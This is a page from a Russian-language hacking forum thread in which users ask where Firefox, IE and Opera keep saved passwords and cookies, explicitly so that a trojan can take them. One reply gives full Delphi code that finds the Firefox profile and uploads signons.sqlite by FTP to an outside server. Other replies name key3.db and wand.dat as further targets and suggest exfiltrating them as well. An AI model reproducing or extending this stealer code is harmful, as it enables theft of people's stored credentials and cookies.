Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   С/С++, C#, Delphi, .NET, Asm (https://forum.antichat.xyz/forumdisplay.php?f=24)
-   -   Откуда из Браузеров Трой тянет инфу о паролях и почте?? (https://forum.antichat.xyz/showthread.php?t=167253)

TikTik 31.12.2009 00:42
Откуда из Браузеров Трой тянет инфу о паролях и почте??
 
Откуда из Браузеров Трой тянет инфу о паролях и почте?? интрересуют Mozila и IE если можно название файликов и пути к ним пожалуйста

Gar|k 31.12.2009 01:18
Если не в ломы напишите еще где лежат cookie в разных обозревателях.
самому лень ) (з.ы в софари не нашел нихрена)

с наступающим!!!

wolmer 31.12.2009 01:27
Цитата:
Сообщение от TikTik
Откуда из Браузеров Трой тянет инфу о паролях и почте?? интрересуют Mozila и IE если можно название файликов и пути к ним пожалуйста
Mozilla

Вроде как файле signons.sqlite -> сохр пароли (но не уверен)(Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\sign ons.sqlite')

Код который тырит сохр. пароли:
Код:
unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, IdBaseComponent, IdComponent, IdTCPConnection,
  IdTCPClient, IdFTP;

type
  TForm1 = class(TForm)
    ListBox1: TListBox;
    Edit1: TEdit;
    IdFTP1: TIdFTP;
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

//На переменные которые лишние -> не обращаем внимания  :)

function GetUserFromWindows: string;
var
  UserName : string;
  UserNameLen : Dword;
begin
  UserNameLen := 255;
  SetLength(userName, UserNameLen);
  if GetUserName(PChar(UserName), UserNameLen) then
    Result := Copy(UserName,1,UserNameLen - 1)
  else
    Result := 'Unknown';
end;

function GetSystemDisk: string;
var
 S: array[0..MAX_PATH] of Char;
begin
  GetWindowsDirectory(S,SizeOf(S));
  Result:=copy(S,0,1);
end;

procedure TForm1.FormCreate(Sender: TObject);
var
User,Disc:string;
coock,st,mask:string;
f:TextFile;
i:integer;
Sf:tsearchrec;
find:integer;
Firefox:string;
FireFoxUser:string;
begin
 //code by wolmer
 Disc:=GetSystemDisk;
 User:=GetUserFromWindows;
 find:=FindFirst(Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\*',faDirectory,sf);
  if find=0 then
  begin
    if ((Sf.Attr and faDirectory) = faDirectory) and
    ((Sf.Name = '.') or (Sf.Name = '..')) then
    begin
      Find:=FindNext(Sf);
    end;
  find:=FindNext(sf);
  FireFoxUser:=sf.name;
  end;
Firefox:= Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\signons.sqlite';
if FileExists(Firefox) then
 begin
  IdFTP1.Username:='123';
  IdFTP1.Password:='123';
  IdFTP1.Host:='ftp.narod.ru';
  IdFTP1.Port:=21;
  IdFTP1.Connect();
  IdFTP1.Put(FireFox, 'NameFile1');
  IdFTP1.Disconnect;
 end;
end;


end.
Ну а куки мозила хранит в cookies.sqlite

Вот для многих будет полезная информация о том какой файл и за что отвечает в мозиле:
http://wiki.mozilla-russia.org/index.php/О%20профилях%20Mozilla%20Firefox

TikTik 31.12.2009 01:55
Цитата:
Сообщение от wolmer

Ну а куки мозила хранит в cookies.sqlite

Вот для многих будет полезная информация о том какой файл и за что отвечает в мозиле:
http://wiki.mozilla-russia.org/index.php/О%20профилях%20Mozilla%20Firefox
cпасибо !!только не могу найти где же эти cocie.sqlite :((

там вот вычитал что есть такой cookies.txt а гдеон падлюка спрятан блиинн :mad:

ProTeuS 31.12.2009 02:01
opera = wand.dat

wolmer 31.12.2009 02:11
Цитата:
cпасибо !!только не могу найти где же эти cocie.sqlite
Не ужели их тут нету? -> Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\'

В основном в этом пути все хорошое/вкусное держится

Linkus 31.12.2009 02:13
Цитата:
Сообщение от wolmer
Код который тырит сохр. пароли:
ну спёр ты signons.sqlite, а дальше что с ним делать? :) написал бы чем расшифровывать :) и по-моему без key3.db ничего не сделаешь :)

wolmer 31.12.2009 02:15
Цитата:
Сообщение от Linkus
ну спёр ты signons.sqlite, а дальше что с ним делать? :) написал бы чем расшифровывать :) и по-моему без key3.db ничего не сделаешь :)
Взял информацию из первого же источника в гугле, в крайнем случае ничего не мешает добавить еще одну строчку на залив файла key3.db

(чем расшифровывать -> гуглите, в крайнем случае -> офф сайт мозилы)

TikTik 31.12.2009 03:34
хм а имя юзера в Profile всегда разное какже путь та указывать до папочки :(

Linkus 31.12.2009 03:52
Цитата:
Сообщение от TikTik
хм а имя юзера в Profile всегда разное какже путь та указывать до папочки :(
читай код, приведённый wolmer'ом внимательнее :)

там находится первая попавшаяся папка в \Profiles, имя которой отлично от . и ..

можно для всех найденных папок реализовать, если их несколько :)


Время: 20:20
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице